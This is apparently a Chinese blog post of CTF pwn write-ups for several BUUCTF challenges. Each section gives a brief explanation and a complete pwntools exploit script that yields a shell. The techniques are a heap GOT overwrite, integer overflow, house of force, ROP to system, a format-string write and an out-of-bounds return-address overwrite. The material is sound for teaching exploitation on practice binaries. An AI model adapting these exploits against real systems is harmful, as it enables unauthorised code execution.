buuctf node和本体互换修改free_got为system 整数溢出 32位house of force 数组越界改ret

最新推荐文章于 2024-03-02 20:27:03 发布
最新推荐文章于 2024-03-02 20:27:03 发布
阅读量508 收藏
点赞数 1
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/107999191
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

文章目录

npuctf_2020_easyheap

这题和之前的hitcontraining_heapcreator一样……
让node和本体互换就行了
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './npuctf_2020_easyheap'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29687)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g = [0x4f2c5, 0x4f322, 0x10a38c]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(choice):
    sea('Your choice :', str(choice))
def add(size, content):
    menu(1)
    sea('Size of Heap(0x10 or 0x20 only) : ', str(size))
    sea('Content:', content)
def edit(index, content):
    menu(2)
    sea('Index :', str(index))
    sea('Content: ', content)
def show(index):
    menu(3)
    sea('Index :', str(index))
def free(index):
    menu(4)
    sea('Index :', str(index))
add(0x18, 'aa')
add(0x18, 'aa')
p = '/bin/sh\x00'+p64(0)*2+p8(0x41)
edit(0, p)
free(1)
add(0x38, 'a'*0x20+p64(0x30)+p64(elf.got['free']))
show(1)
system = uu64(ru('\x7f')[-6:]) - libc.sym['free'] + libc.sym['system']
edit(1, p64(system))
free(0)

r.interactive()

wustctf2020_number_game

int -2147483648 --> 2147483647          2147483648会变成-2147483648          -2147483649会变成2147483647           也就是说int是-2147483648到2147483647的循环

-2147483648         -1                    0        1      2147483647
0x80000000   0xFFFFFFFF       0x0    0x1     0x7FFFFFFF

也就是最大正数+1=最小负数 最小负数-1=最大正数

from pwn import *
from LibcSearcher import * 

local_file  = './wustctf2020_number_game'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 28062)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)
sl('-2147483648')

r.interactive()

bcloud_bctf_2016

32位heap太折磨人了,orz
前面三个输入有漏洞
在这里插入图片描述
在这里插入图片描述
具体的可以看这里,总结一下就是虽然MyRead添加了\0,但是因为栈的关系,当read0x40时,malloc的时候把\0给覆盖了,导致后面strcpy一路复制下去了
https://blog.csdn.net/qq_33528164/article/details/79870585
https://blog.csdn.net/seaaseesa/article/details/105588058
后面就是house of force
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './bcloud_bctf_2016'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'

select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25289)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sla('option--->>\n', str(choice))
def add(size, content):
    menu(1)
    sla('note content:\n',str(size))
    sla('content:\n',content)
def edit(index, content):
    menu(3)
    sla('id:\n',str(index))
    sla('content:\n',content)
def free(index):
    menu(4)
    sla('id:\n',str(index))
def syn():
    menu(5)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
free_got = elf.got['free']
sea('Input your name:','a'*0x40)
ru('a'*0x40)
heap_addr = uu32(rc(4))
info('heap_addr', heap_addr)
sea('Org:','a'*0x40)
sla('Host:',p32(0xFFFFFFFF))
top = heap_addr + 0xd0
heap_ptr = 0x0804B120
offset = heap_ptr - top - 0x10
add(offset, '')
add(0x18, 'aa')
edit(1,p32(0) + p32(free_got) + p32(puts_got) + p32(0x0804B130) + '/bin/sh\x00')
edit(1,p32(puts_plt) + '\n')
info('puts_plt', puts_plt)
free(2)
puts_addr = uu32(rc(4))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
edit(1, p32(system))
free(3)
r.interactive()

用了32的16libc好像不对,用libcsearcher解决了
记得binsh是要用地址的,所以binsh前面有个0x0804B130,是binsh的地址

mrctf2020_easy_equation

这题好像本意是格式化字符串,结果直接ret给做了……
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './mrctf2020_easy_equation'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26205)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

pop_rdi = 0x0000000000400753
binsh = 0x0000000000400774
p = 'a' + 'b'*8 + p64(pop_rdi) + p64(binsh) + p64(elf.plt['system'])
sl(p)


r.interactive()

格式化字符串的:
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './mrctf2020_easy_equation'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26205)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)
judge = 0x60105C
p = 'a' + '%' + str(1) + 'c%9$na' + p64(judge)
sl(p)

r.interactive()

具体的debug观察一下栈结构就好了

wustctf2020_name_your_cat

这题比较有意思,是一道数组越界改ret
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './wustctf2020_name_your_cat'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29187)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

backdoor = 0x080485CB
for i in range(1, 5):
    sl(str(i))
    sl('aa')
sl('7')
sl(p32(backdoor))

r.interactive()

简单来说就是数组距离ret的距离是0x38, 也就是56,所以如果我们输入7,那就是7*8=56
在这里插入图片描述
那我们就能够改ret的内容了
但是我们要先填充完前4个,不然无法触发ret

真岛忍
关注
专栏目录
buu bjdctf_2020_babystack2 整数溢出、栈溢出
qq_41849152的博客
09-14 191
整数溢出、栈溢出
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1033
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTF SROP UAF House of Force 修改free_got为system 静态链接
carol2358的博客
07-12 472
ciscn_2019_es_7 ciscn_2019_es_7 贴张表: ip是接下去要干的,sp是这里干完接下来要干的地址(大概XD) 怎么找binsh看我之前这篇: https://blog.csdn.net/carol2358/article/details/105643009 rsi 当然直接调试找也是可以的 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_es_7' loca
BUUCTF-pwn2_sctf_2016(整数溢出+泄露libc)
半岛铁盒的博客
08-02 537
32位开启了nx保护 没有看到system和‘/bin/sh’,开启了NX保护,是泄露libc类型的题目 main函数就调用了一个vuln函数 7行的输入函数不是get,是程序自定义的函数get_n a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。也就是说我们这边可以输入负数来达到溢出的效果(整数溢出) 一开始输入负数,绕过长度限制,造成溢出 利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址 溢出覆盖返回地址去执行sy
[PWN] BUUCTF pwn2_sctf_2016(整数溢出+泄露libc)
空城惜梦的博客
06-05 770
[PWN] BUUCTF pwn2_sctf_2016解题分析漏洞利用payload分析payload1payload2 解题分析 按照惯例先checksec,开了nx保护和部分RELRO 接着运行文件,观察程序的运行逻辑,读入一个长度len然后把输入的字符,再打印输入的Len个字符 32位IDA打开文件,main函数调用了vuln() 发现对输入的长度len做出了限制,len不能大于32 当len>32后,程序将结束,这就导致无法直接溢出 进入get_n函数,发现get_n会接收a2个长度
buuctf pwn (第三波)学会利用整数溢出
月阴荒的博客
04-04 737
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
浅析C语言编程中的数组越界问题
07-30
数组越界有两种情况:堆中的数组越界和栈中的数组越界。 1. 堆中的数组越界 堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给写掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对。...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4080
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2427
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 439
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
ssh2框架下多表查询的单个模块开发
01-28
基于ssh2框架下多表查询的单个模块开发。其中的页面跳转是通过MVC中的ModelandView实现的。
pwn刷题num39----整数溢出
tbsqigongzi的博客
05-02 459
BUUCTF-PWN-bjdctf_2020_babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看一下主函数 char buf; // [rsp+0h] [rbp-10h] ..... ...... ...... ........ if ( (signed int
CTF笔记:溢出利用
PwnGuo的博客
05-19 1000
整数溢出 典型整数溢出利用 这个 v3 是一个无符号数,最大只能 255,如果超过的话就会进行 mod 255所以可以传入一个总共是 0x105 的, 这样他的得到的就是 6 是符合长度限制的,从而绕过 if 的检测dest 的大小是 0x11h,加上 ebp 的 0x4h,所以需要在前面填充 0x15h 后门程序 exp: python2 #coding=utf-8 from pwn import * p=remote('node3.buuoj.cn',29748) p.recvuntil("na
[BUUCTF]PWN——gyctf_2020_forcehouse of force
mcmuyanga的博客
01-29 951
gyctf_2020_force 附件 步骤
House of force —— gyctf_2020_force
PLpa的博客
08-13 914
前言: House of force是属于House of xxx系列的利用方法,House of xxx是2004年《The Malloc Maleficarum-Glibc Malloc Exploitation Techniques》中提出的一系列针对glibc堆分配机制的利用方法。 想要利用House of force,需要以下条件: 1.能够以溢出等方式控制top chunk的size域。 2.能够自由的分配堆的大小 解题思路 保护机制 保护全开,64位。 IDA查看伪代码 程序有两个功能,
npuctf_2020_easyheap
qq_51687381的博客
07-27 279
这题的结构,像是hacknote 和之前一个easyheap的融合。 但是漏洞利用手法不太一样。之前的一个easyheap是利用fastbin里面的一种漏洞。伪造一个fake chunk。(这道题的原因是因为,就算伪造了一个fake chunk ,我们malloc时也无法利用它) 这次的漏洞:是将control chunk 和content chunk 对调,然后对control chunk攻击。 from pwn import * elf = ELF("./npuctf_2020_easyhea
BUUCTF-pwn(11)
njh18790816639的博客
01-09 2744
mrctf2020_easy_equation 简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞! axb_2019_fmt64 经典循环格式化字符串64位漏洞! 唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击! from elftools.construct.macros import Padding from pwn import * from LibcSearcher import * context(log_level='debu
[BUUCTF]-PWN:wustctf2020_number_game解析(补码,整数漏洞)
最新发布
2301_79326813的博客
03-02 242
查看保护查看ida大致意思就是输入一个数绕过if。
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 713
buuctf wp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值